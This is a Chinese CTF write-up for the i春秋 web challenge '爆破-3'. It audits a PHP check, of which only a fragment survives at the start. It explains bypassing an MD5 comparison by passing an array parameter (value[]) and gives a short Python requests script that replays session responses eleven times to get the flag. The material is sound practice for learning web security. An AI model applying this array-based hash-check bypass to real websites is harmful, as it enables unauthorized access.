i春秋 CTF misc web:爆破-3

题目提示:这个真的是爆破。

=10){
  echo $flag;
}

show_source(__FILE__);
?>

与前两个题类似,先进行代码审计。
$value = $_REQUEST[‘value’];可以看出PHP将值保存到value中。即xxx.php?value=x
由if判断条件看出
SESSION[‘whoami’]应与value的第1第2个字符相同(即value=eaxxxx),并且进行MD5加密。(经百度得知,数组类型不进行MD5加密,所以想法是传value[])
最后的if得出需要经过11次才能显示flag。
之后进项爆破,可以手动,可以利用Python脚本
手动爆破:
i春秋 CTF misc web:爆破-3_第1张图片
i春秋 CTF misc web:爆破-3_第2张图片
一共需要进行重复10次
最后会出来flag
i春秋 CTF misc web:爆破-3_第3张图片
python脚本注入:(Python脚本注入原理与手工注入相同)

import requests

url='http://2b974b9732094bcf9490176750686b3871a7cfcaf44c47fe.game.ichunqiu.com?value[]='

a=requests.session()
b=a.get(url+'ea')

for i in range(11):
	c=a.get(url+b.text[:2])
	b=c
	print(b.text)
	pass

将脚本运行完,只需看最后一个输出就行。
i春秋 CTF misc web:爆破-3_第4张图片

你可能感兴趣的:(渗透测试平台笔记,CTF)